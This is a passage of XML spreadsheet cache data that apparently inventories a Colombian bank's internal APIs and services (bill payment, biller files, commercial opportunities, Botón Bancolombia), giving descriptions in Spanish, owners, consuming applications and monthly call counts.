    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="109"/>
    <m/>
    <m/>
    <n v="10"/>
    <n v="21"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-03T19:50:55"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payment - Schedules"/>
    <n v="110"/>
    <x v="29"/>
    <s v="El API Bill Payment - Schedule le permitirá al consumidor gestionar la programación del pago de sus facturas. Podrá crear, eliminar y actualizar la programación del pago de sus facturas"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="2"/>
    <m/>
    <m/>
    <n v="24"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-03T19:50:55"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payments - Information Payer"/>
    <n v="101"/>
    <x v="30"/>
    <s v="El API Bill Payments - Information Payer permitirá a los usuarios obtener información sobre los pagos de facturas realizados, en canales virtuales. La información podrá ser consultada en un rango de tiempo de máximo tres meses a partir del níºmero de identificación del pagador, adicional tendrá otras opciones para filtrar la consulta que facilitarán su proceso de bíºsqueda."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="225"/>
    <n v="474"/>
    <n v="387"/>
    <n v="253"/>
    <n v="236"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-26T13:56:03"/>
    <s v="Bill Payments Execution"/>
    <n v="100"/>
    <s v="Bill Payments Execution - Payments"/>
    <n v="100"/>
    <x v="31"/>
    <s v="La API permitirá a los consumidores realizar el pago de  Facturas previamente inscritas, deben estár asociadas a un convenio de recaudo. El pago podrá realizarse con debito a cuenta y efectivo. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <s v="PagoFacturaConConvenio/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-05-20T10:56:01"/>
    <s v="Bill Payments Order"/>
    <n v="100"/>
    <s v="Bill Payments Order - Bills"/>
    <n v="100"/>
    <x v="32"/>
    <s v="La API Bill Payments Order - Bills Permitirá a los consumidores realizar la consulta y eliminación de las facturas inscritas que tiene un cliente en particular, adicionalmente se podrá consultar el detalle de una factura programada para pagos automáticos mensuales."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <s v=""/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ app1 _x000d__x000a_ AppAuditoriaApisEjemplo"/>
    <n v="363508"/>
    <n v="451080"/>
    <n v="548944"/>
    <n v="268199"/>
    <n v="301837"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T11:34:53"/>
    <s v="Biller"/>
    <n v="111"/>
    <s v="Biller - Management"/>
    <n v="100"/>
    <x v="33"/>
    <s v="El API Biller - Management permitirá a los recaudadores hacer gestión sobre sus facturas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="AnulacionFacturaRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <n v="15090"/>
    <n v="13819"/>
    <n v="12767"/>
    <n v="13183"/>
    <n v="13692"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-10T14:48:58"/>
    <s v="Biller"/>
    <n v="111"/>
    <s v="Biller - Transactions"/>
    <n v="101"/>
    <x v="34"/>
    <s v="El API Biller - Transactions permitirá consultar los movimientos de un convenio de recaudo, los datos son consultados a partir del tipo y níºmero de identificación del recaudador, estos datos deberán obtenerse en la api Collection Agreements - Information retrieveDetailAgreement, de manera opcional podrá consultar los movimientos a partir del codigo del convenio, la cuenta recaudadora, la forma de pago, el canal y el estado."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <n v="1246"/>
    <n v="3347"/>
    <n v="6518"/>
    <n v="5956"/>
    <n v="10336"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-18T19:47:34"/>
    <s v="Biller Files"/>
    <n v="132"/>
    <s v="Biller Files - Files Sent"/>
    <n v="102"/>
    <x v="35"/>
    <s v="La API permite listar los archivos que el core de recaudos le ha enviado al recaudador, estos pueden contener información sobre los recaudos que fueron captadas (consolidado o tiempo real) o novedades"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaArchivosEnviadosRecaudador/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <n v="3"/>
    <n v="12"/>
    <n v="57"/>
    <n v="41"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-25T22:24:24"/>
    <s v="Biller Files"/>
    <n v="132"/>
    <s v="Biller Files - Information"/>
    <n v="120"/>
    <x v="36"/>
    <s v="Esta Api permite consultar la información de los archivos que son enviados por el recaudador, se tienen tres tipos de archivos, facturas, cobros y novedades. Se tienen dos operaciones que permitiran obtener información resumida de los archivos y luego obtener el detalle de la información de uno de ellos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaArchivoRecaudos/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <m/>
    <n v="1"/>
    <n v="1"/>
    <m/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T12:55:07"/>
    <s v="Biller Files"/>
    <n v="132"/>
    <s v="Biller Files - Management"/>
    <n v="120"/>
    <x v="37"/>
    <s v="El API Biller File - Management permite gestionar los archivos del recaudador, como su anulación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="GestionArchivoRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Bloquear Desbloquear Usuario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir Bloquear ó Desbloquear el usuario de una persona natural para que no pueda utilizar el canal de las filiales Panamá/Cayman, Miami."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Bloquear Primera Segunda Clave SVP"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permitie Bloquear la primera o segunda clave a través de la sucursal virtual personas, ya sea por intentos de acceso errados o por solicitud del cliente para las filiales Panamá/Cayman, Miami"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="BM_SVE_Acceder Acuerdo Trade"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La funcionalidad de consulta le permite a un cliente realizar la solicitud de consultas de un producto Trade desde la Sucursal Virtual Empresas (SVE) hacia FINACLE."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-20T14:52:35"/>
    <s v="Commercial Information"/>
    <n v="100"/>
    <s v="Branch Commercial Team"/>
    <n v="100"/>
    <x v="38"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los códigos CIF y CRM del equipo comercial de una sucursal, es decir su gerente, los asesores o vendedores y la identificación o código de la sucursal."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="VisorInteractivo_AW1249001"/>
    <n v="106853"/>
    <n v="142489"/>
    <n v="192460"/>
    <n v="201563"/>
    <n v="202867"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-07T10:26:10"/>
    <s v="Business Opportunities"/>
    <n v="101"/>
    <s v="Business Opportunities - Consolidated"/>
    <n v="101"/>
    <x v="39"/>
    <s v="A través de esta operación se puede obtener todo el consolidado de oportunidades comerciales asignadas a un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="VisorInteractivo_AW1249001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="26999459"/>
    <n v="87794372"/>
    <n v="87155684"/>
    <n v="88695635"/>
    <n v="103033730"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-04T17:21:00"/>
    <s v="Business Opportunities Sme"/>
    <n v="111"/>
    <s v="Business Opportunities - SME Generals Inquiry"/>
    <n v="102"/>
    <x v="40"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales del segmento personas y Pyme a la carta, que resultan de los modelos analí­ticos del banco y que se entregan a la LZ."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ LimitsCreditExhibition_NU0114001"/>
    <n v="14794"/>
    <n v="14917"/>
    <n v="9655"/>
    <n v="9689"/>
    <n v="18352"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-04T17:21:00"/>
    <s v="Business Opportunities Sme"/>
    <n v="111"/>
    <s v="Business Opportunities - SME Management"/>
    <n v="102"/>
    <x v="41"/>
    <s v="La API tiene la gestion de las oportunidades comerciales pyme."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ LimitsCreditExhibition_NU0114001"/>
    <n v="11994"/>
    <n v="11289"/>
    <n v="9665"/>
    <n v="8328"/>
    <n v="12524"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-04T17:21:00"/>
    <s v="Business Opportunities Sme"/>
    <n v="111"/>
    <s v="Business Opportunities - SME PreApproved Inquiry"/>
    <n v="111"/>
    <x v="42"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales de pre- aprobados de los clientes del segmento pyme, para pymes con estados financieros y preaprobados para pymes sin estados financieros, la api proporciona un método para cada grupo."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ LimitsCreditExhibition_NU0114001"/>
    <n v="11922"/>
    <n v="11141"/>
    <n v="9679"/>
    <n v="8338"/>
    <n v="12483"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-07T10:26:10"/>
    <s v="Business Opportunities"/>
    <n v="101"/>
    <s v="Business Opportunities MasterData"/>
    <n v="101"/>
    <x v="43"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la informacion general de los catalogos."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="VisorInteractivo_AW1249001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="5947313"/>
    <n v="8781649"/>
    <n v="12202895"/>
    <n v="13129075"/>
    <n v="14781955"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-07T10:26:13"/>
    <s v="Business Opportunities Person"/>
    <n v="101"/>
    <s v="Business Opportunities Persons - Generals"/>
    <n v="101"/>
    <x v="44"/>
    <s v="La API permite consultar las oportunidades comerciales del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SUFIOriginacion_AW1097001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="368700"/>
    <n v="538061"/>
    <n v="711026"/>
    <n v="763093"/>
    <n v="836492"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-07T10:26:13"/>
    <s v="Business Opportunities Person"/>
    <n v="101"/>
    <s v="Business Opportunities Persons - Management"/>
    <n v="101"/>
    <x v="45"/>
    <s v="La API tiene la gestion de las oportunidades comerciales personas."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SUFIOriginacion_AW1097001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="94559"/>
    <n v="132745"/>
    <n v="147349"/>
    <n v="156828"/>
    <n v="171153"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-07T10:26:13"/>
    <s v="Business Opportunities Person"/>
    <n v="101"/>
    <s v="Business Opportunities Persons-Preapproved"/>
    <n v="101"/>
    <x v="46"/>
    <s v="La API permite consultar los pre-aprobados del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SUFIOriginacion_AW1097001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="149028"/>
    <n v="229099"/>
    <n v="272763"/>
    <n v="327707"/>
    <n v="370283"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Account"/>
    <n v="100"/>
    <x v="47"/>
    <s v="El api Button Account permite consultar las cuentas de un cliente que cumplan con las codiciones para pagar por medio del producto Botón Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <m/>
    <m/>
    <m/>
    <n v="73"/>
    <n v="13435"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Information"/>
    <n v="101"/>
    <x v="48"/>
    <s v="Esta api permite llevar a cabo las siguientes funcionalidades de consulta relacionadas con el servicio Botón Bancolombia.   - Consultar vinculación comercio/cliente, Permite listar los comercios vinculados a Botón - Consultar botones cliente, Permite listar los botones de todos los comercios asociados a un cliente, así­ como filtrar los botones generados por comercio, rango de fechas de creación, estado del botón (Activo, Inactivo, Retirado). - Consultar Detalle del Comercio, Capacidad que permite mostrar el detalle de los comercios vinculados a Botón. - Consultar Detalle de un Botón, Capacidad que permite mostrar el detalle de un botón."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2980"/>
    <n v="2782"/>
    <n v="2423"/>
    <n v="2123"/>
    <n v="2366"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Management"/>
    <n v="101"/>
    <x v="49"/>
    <s v="## **Button - Management** El api Button - Management permite realizar diferentes operaciones relacionadas con el botón Bancolombia: **1. Crear Botón:** Permite la creación de un botón al servicio de Botón Bancolombia   **2. Modificar Información de Botón:** Esta operación permite actualizar la información de un botón generado por un comercio vinculado en Botón Bancolombia. La información que se puede modificar es la siguiente:   - Fecha de vencimiento del botón.   - Referencia.   - Nombre.   - Descripción.   - Valor por unidad.   - Cantidad de productos.   **3. Estado de Boton:** Permite cambiar el estado de uno o varios botones generados por un comercio vinculado a Botón Bancolombia. Los estados se pueden cambiar entre  - ACTIVO  - INACTIVO  - RETIRADO       Para realizar el cambio de estado, la bíºsqueda se puede realizar por botón, identificador íºnico de comercio, o datos de identificación del comercio guardados en la vinculación al producto Botón Bancolombia (tipo y níºmero de documento). Si la bíºsqueda se realiza por tipo y níºmero de documento o identificador íºnico del comercio, el cambio de estado de botón aplicará a todos los botones asociados al comercio."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2979"/>
    <n v="2783"/>
    <n v="2312"/>
    <n v="2126"/>
    <n v="2382"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Onboarding"/>
    <n v="101"/>
    <x v="50"/>
    <s v="## **Button - Onboarding**  Permite llevar a cabo las siguientes funcionalidades relacionadas con el servicio Botón Bancolombia: **1. Vinculación del Comercio:** Permite realizar la vinculación de un comercio realizando la inscripción al servicio Botón Bancolombia para habilitar su Uso.   **2. Modificar Vinculación comercio:** Permite Modificar la información de vinculación en el servicio de Botón Bancolombia.    **3. Cambio de estado:** Permite realizar un cambio de estado de un comercio relacionado a la vinculación en Botón Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2982"/>
    <n v="2777"/>
    <n v="2430"/>
    <n v="2128"/>
    <n v="2373"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Technical Setting"/>
    <n v="101"/>
    <x v="51"/>
    <s v="Esta api permite llevar a cabo las siguientes funcionalidades relacionadas con el servicio Botón Bancolombia   - Registro de Información Técnica del reporte: Permite  Almacenar la Información  Técnica  del reporte  parametrización para configuración la  transmisión de archivos   (Sterling). - Registro de Información Técnica del CallBack: Permite realizar el registro de información del comercio con las Llaves privadas para Credenciales CallBack. - Modificar la Información Técnica del reporte: Permite realizar la modificación de la de información del reporte.   - Modificar la información técnica del CallBack: Permite realizar la modificación de las credenciales del CallBack."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2982"/>
    <n v="2780"/>
    <n v="2424"/>
    <n v="2132"/>
    <n v="2346"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Calcular Operacion Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Calcular Operación Divisas se encargará de realizar validación de la operación, previo a completar la operación de divisas el sistema expondrá al usuario la información del a negociación que está realizando a través de este servicio._x000a_El servicio cuenta con las operaciones de calculo de compra y calculo de venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Calculo Cuota Credito"/>
    <n v="100"/>
    <x v="0"/>
